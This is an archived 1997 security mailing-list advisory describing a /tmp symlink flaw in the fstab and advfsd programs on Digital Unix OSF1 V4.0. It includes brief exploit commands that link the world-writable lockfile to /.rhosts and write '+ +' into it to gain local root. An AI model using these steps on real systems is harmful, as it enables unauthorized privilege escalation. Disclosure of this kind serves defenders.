Symlink problems with fstab and advfsd in OSF1
| Description: | These programs create /tmp files that will follow symlinks and lcobber system files |
| Author: | Efrain Torres Mejia <etorres@POLLUX.JAVERIANA.EDU.CO> |
| Compromise: | root (local) |
| Vulnerable Systems: | Digital Unix OSF1 V4.0 |
| Date: | 18 November 1997 |
Date: Tue, 18 Nov 1997 12:17:00 -0500
From: Efrain Torres Mejia <etorres@POLLUX.JAVERIANA.EDU.CO>
To: BUGTRAQ@NETSPACE.ORG
Subject: (LOWNOISE) Another Digital Unix Security Problem0
.LoW _ _
|\ | _ |(_`|_'
| \|(_)|,_)|_.
==========================
H0l4. So here it is another bug for Digital
System: OSF1 my.narco-goverment.sucks.co V4.0 464 alpha
Program: fstab - Static information about file systems and swap partitions
advfsd - Starts the AdvFS graphical user interface daemon
Problemo: It creates a lockfile in tmp with nice permitions :)
/tmp>ls -la
(Blah Blah Blah.....)
-rw-rw-rw- 1 root system 0 Nov xx 15:49 fstab.advfsd.lockfile
What the hell to do with it:
Before it creates
ln -s /.rhosts /tmp/fstab.advfsd.lockfile
from here... cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc.
if u like to cut:
------------------------- Cut here --------------------
------------------------- and here --------------------
The End - El Fin
Colombia 1997.
.LoW _ _
|\ | _ |(_`|_'
| \|(_)|,_)|_.
Efrain 'ET' Torres
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
